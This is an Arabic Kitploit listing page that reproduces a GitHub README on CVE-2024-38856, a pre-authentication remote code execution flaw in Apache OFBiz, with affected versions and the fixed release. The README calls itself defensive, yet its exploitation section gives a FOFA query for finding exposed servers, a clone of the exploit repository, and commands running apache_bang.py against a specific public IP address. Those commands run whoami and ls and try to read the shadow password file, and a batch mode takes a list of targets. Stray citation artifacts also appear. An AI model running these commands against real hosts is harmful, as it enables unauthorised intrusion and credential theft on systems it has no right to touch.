Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38856-Apache-OFBiz — CVE-2024-38856: ماسح ضوئي واستغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache OFBiz | Kitploit
أدوات/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: ماسح ضوئي واستغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache OFBiz

عرض المستودع
33منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-38856 — Apache OFBiz (توثيق المستودع)

الغرض من المستودع: توثيق معلوماتي حول CVE-2024-38856 (Apache OFBiz - تفويض غير صحيح / RCE قبل المصادقة).
لا يحتوي هذا المستودع على كود استغلال مُسلّح. إنه مخصّص للبحث الدفاعي، والإرشادات المتعلقة بالتصحيح، والكشف، والاختبار المعملي الآمن فقط.


نظرة عامة

CVE-2024-38856 هي ثغرة تفويض غير صحيح في Apache OFBiz قد تسمح بوصول غير مصادق إلى نقاط نهاية معينة، وفي ظل ظروف محددة، تتيح تنفيذ كود عرض الشاشة مما قد يؤدي إلى تنفيذ برمجي عن بُعد على الأنظمة المتأثرة. تم إصلاح المشكلة في Apache OFBiz 18.12.15؛ الإصدارات السابقة حتى 18.12.14 متأثرة. :contentReference[oaicite:0]{index=0}

الخطورة / الأثر: صنّف العديد من بائعي الأمن والباحثين هذه الثغرة على أنها حرجة — إذ يمكن أن تؤدي إلى تنفيذ برمجي عن بُعد دون مصادقة على النسخ المستضعفة، وقد لوحظت محاولات استغلال نشطة لها في البيئات الحقيقية. يجب على المسؤولين التعامل مع نسخ OFBiz المكشوفة كبنود معالجة ذات أولوية عالية. :contentReference[oaicite:1]{index=1}


الإصدارات المتأثرة

  • Apache OFBiz: حتى 18.12.14 (أي أن جميع الإصدارات <= 18.12.14 تعتبر عرضة للخطر). تمت معالجة المشكلة في 18.12.15. يُنصح بالترقية. :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"

لقطة شاشة 2025-10-10 183057

الاستغلال:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

لقطة شاشة 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

لقطة شاشة 2025-10-10 075018
تنزيل الأداة